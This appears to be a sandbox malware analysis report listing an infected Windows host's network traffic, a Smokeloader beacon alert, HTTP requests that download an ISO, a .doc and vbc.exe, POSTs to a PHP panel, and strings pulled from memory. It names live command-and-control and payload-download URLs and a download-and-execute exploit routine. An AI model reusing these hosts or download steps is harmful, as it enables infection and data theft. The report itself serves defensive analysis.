              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.174.217.42:80
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficTCP traffic: 34.174.217.42:80 -> 192.168.2.22:49173
              Source: global trafficDNS query: name: esplogem.ga
              Source: global trafficDNS query: name: esplogem.ga
              Source: global trafficDNS query: name: ndtcconsultant.com
              Source: global trafficDNS query: name: ndtcconsultant.com
              Source: global trafficDNS query: name: www.hzncars.com.my
              Source: global trafficDNS query: name: esplogem.ga
              Source: global trafficDNS query: name: esplogem.ga
              Source: global trafficDNS query: name: api.ipify.org
              Source: global trafficDNS query: name: api.ipify.org
              Source: global trafficDNS query: name: www.hzncars.com.my
              Source: global trafficDNS query: name: dropbuyinc.ga
              Source: global trafficDNS query: name: www.hzncars.com.my
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 69.160.38.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 3.232.242.170:443
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 69.160.38.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 69.160.38.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 69.160.38.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 69.160.38.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 69.160.38.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 69.160.38.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 69.160.38.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 69.160.38.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 69.160.38.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 3.232.242.170:443
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 3.232.242.170:443
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 3.232.242.170:443
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 3.232.242.170:443
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 3.232.242.170:443
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 3.232.242.170:443
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 3.232.242.170:443
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 3.232.242.170:443
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 3.232.242.170:443
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49175 -> 183.78.168.24:80
              Source: global trafficTCP traffic: 192.168.2.22:49178 -> 183.78.168.24:80
              Source: global trafficTCP traffic: 192.168.2.22:49180 -> 183.78.168.24:80

              Networking

              barindex
              Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 34.174.217.42 80Jump to behavior
              Source: C:\Windows\explorer.exeDomain query: ndtcconsultant.com
              Source: C:\Windows\SysWOW64\explorer.exeDomain query: esplogem.ga
              Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.22:49173 -> 34.174.217.42:80
              Source: C:\Users\user\AppData\Local\Temp\A173.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Local\Temp\A173.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Local\Temp\A173.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Local\Temp\A173.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Local\Temp\A173.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Local\Temp\A173.exeDNS query: name: api.ipify.org
              Source: Malware configuration extractorURLs: http://esplogem.ga/
              Source: Malware configuration extractorURLs: http://poclecta.ga/
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
              Source: global trafficHTTP traffic detected: GET /wp-content/Mzyroxbxfa.bmp HTTP/1.1Host: www.hzncars.com.myConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-content/Mzyroxbxfa.bmp HTTP/1.1Host: www.hzncars.com.myConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-content/Mzyroxbxfa.bmp HTTP/1.1Host: www.hzncars.com.myConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 22 Nov 2022 04:08:15 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30Last-Modified: Mon, 21 Nov 2022 22:01:53 GMTETag: "2ee00-5ee0233fe2eac"Accept-Ranges: bytesContent-Length: 192000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 f5 4c e1 bc 94 22 b2 bc 94 22 b2 bc 94 22 b2 a2 c6 b7 b2 a1 94 22 b2 a2 c6 a1 b2 3c 94 22 b2 9b 52 59 b2 bb 94 22 b2 bc 94 23 b2 27 94 22 b2 a2 c6 a6 b2 93 94 22 b2 a2 c6 b6 b2 bd 94 22 b2 a2 c6 b3 b2 bd 94 22 b2 52 69 63 68 bc 94 22 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5b fa 66 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 98 01 00 00 ac 17 00 00 00 00 00 07 6d 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 40 19 00 00 04 00 00 07 ea 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 99 01 00 50 00 00 00 00 00 19 00 a8 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 3b 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2a 97 01 00 00 10 00 00 00 98 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 46 17 00 00 b0 01 00 00 1a 01 00 00 9c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 37 00 00 00 00 19 00 00 38 00 00 00 b6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: unknownHTTPS traffic detected: 69.160.38.3:443 -> 192.168.2.22:49174 version: TLS 1.0
              Source: global trafficHTTP traffic detected: GET /contract/2022-11-14_02-53.iso HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ndtcconsultant.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 192.227.132.49Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /179/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.132.49Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygujr.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: esplogem.ga
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrbatho.org/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: esplogem.ga
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awqeauxao.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: esplogem.ga
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://posyylxo.org/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: esplogem.ga
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yljegbhrf.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: esplogem.ga
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://esplogem.ga/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 1305Host: esplogem.ga
              Source: global trafficHTTP traffic detected: POST /xplor/inc/9689eb892f604a.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: dropbuyinc.gaContent-Length: 582Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /xplor/inc/9689eb892f604a.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: dropbuyinc.gaContent-Length: 8906Expect: 100-continue
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_0376055E LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_0376055E
              Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
              Source: Joe Sandbox ViewIP Address: 3.232.242.170 3.232.242.170
              Source: Joe Sandbox ViewIP Address: 3.232.242.170 3.232.242.170
              Source: A173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: EQNEDT32.EXE, 00000005.00000002.922376054.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.227.132.49/179/vbc.exe
              Source: EQNEDT32.EXE, 00000005.00000002.922437200.0000000000583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.227.132.49/179/vbc.exehhC:
              Source: EQNEDT32.EXE, 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.227.132.49/179/vbc.exej
              Source: EQNEDT32.EXE, 00000005.00000002.922376054.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.227.132.49/179/vbc.exent%
              Source: 0000_000000_00000.doc.url.0.drString found in binary or memory: http://3236135985/000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.doc
              Source: A173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
              Source: A173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://WNorAn.com
              Source: A173.exe, 0000001B.00000002.1197390155.00000000021E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
              Source: A173.exe, 0000001B.00000002.1197390155.00000000021E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org.herokudns.com
              Source: explorer.exe, 0000000B.00000000.973561613.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: A173.exe, 0000001B.00000002.1194811498.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: A173.exe, 0000001B.00000002.1197973871.0000000002245000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000001B.00000002.1198905464.00000000022DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dropbuyinc.ga
              Source: A173.exe, 0000001B.00000002.1197973871.0000000002245000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dropbuyinc.ga/xplor/inc/9689eb892f604a.php
              Source: A173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dropbuyinc.ga/xplor/inc/9689eb892f604a.php127.0.0.1POST
              Source: A173.exe, 0000001B.00000002.1197973871.0000000002245000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dropbuyinc.gaP
              Source: explorer.exe, 00000010.00000002.1050009065.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1049835976.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1049921800.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1049698689.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.1034056286.00000000003EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1033336451.0000000000070000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.1037367259.0000000000A04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.1039506487.0000000000090000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000013.00000002.1193107861.0000000000324000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1042502896.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.1192362400.00000000001FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.1193152187.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.1045681304.0000000000090000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.1192085488.000000000013E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1048700644.0000000000070000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://esplogem.ga/
              Source: explorer.exe, 00000010.00000002.1049698689.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.1034056286.00000000003EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1033336451.0000000000070000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.1037367259.0000000000A04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.1039506487.0000000000090000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000013.00000002.1193107861.0000000000324000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1042502896.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.1192362400.00000000001FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.1193152187.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.1045681304.0000000000090000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.1192085488.000000000013E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1048700644.0000000000070000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://esplogem.ga/Mozilla/5.0
              Source: explorer.exe, 00000010.00000002.1049921800.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://esplogem.ga/application/x-www-form-urlencodedMozilla/5.0
              Source: explorer.exe, 0000000B.00000000.970463322.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
              Source: explorer.exe, 0000000B.00000000.970463322.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
              Source: A173.exe, 0000000F.00000002.1152911660.00000000025F3000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000000F.00000002.1147789703.0000000002186000.00000004.00000800.00020000.00000000.sdmp, Wlrfmqer.exe, 0000001D.00000002.1198393810.0000000002189000.00000004.00000800.00020000.00000000.sdmp, Wlrfmqer.exe, 0000001D.00000002.1202238156.00000000025F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: explorer.exe, 0000000B.00000000.939356183.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1034020349.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.955023647.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.966991833.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
              Source: explorer.exe, 0000000B.00000000.958830013.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: explorer.exe, 0000000B.00000000.958830013.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: explorer.exe, 0000000B.00000000.940028698.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: A173.exe, 0000000F.00000002.1147471044.0000000002131000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000001B.00000002.1197240370.00000000021D2000.00000004.00000800.00020000.00000000.sdmp, Wlrfmqer.exe, 0000001D.00000002.1197851065.0000000002131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: explorer.exe, 0000000B.00000000.975982341.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
              Source: explorer.exe, 0000000B.00000000.958830013.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
              Source: explorer.exe, 0000000B.00000000.973561613.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
              Source: explorer.exe, 0000000B.00000000.973561613.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
              Source: explorer.exe, 0000000B.00000000.958830013.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
              Source: explorer.exe, 0000000B.00000000.940028698.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
              Source: explorer.exe, 0000000B.00000000.939356183.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1034020349.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.955023647.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.966991833.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: explorer.exe, 0000000B.00000000.973561613.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
              Source: explorer.exe, 0000000B.00000000.970463322.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
              Source: A173.exe, 0000000F.00000002.1147471044.0000000002131000.00000004.00000800.00020000.00000000.sdmp, Wlrfmqer.exe, 0000001D.00000002.1197851065.0000000002131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hzncars.com.my
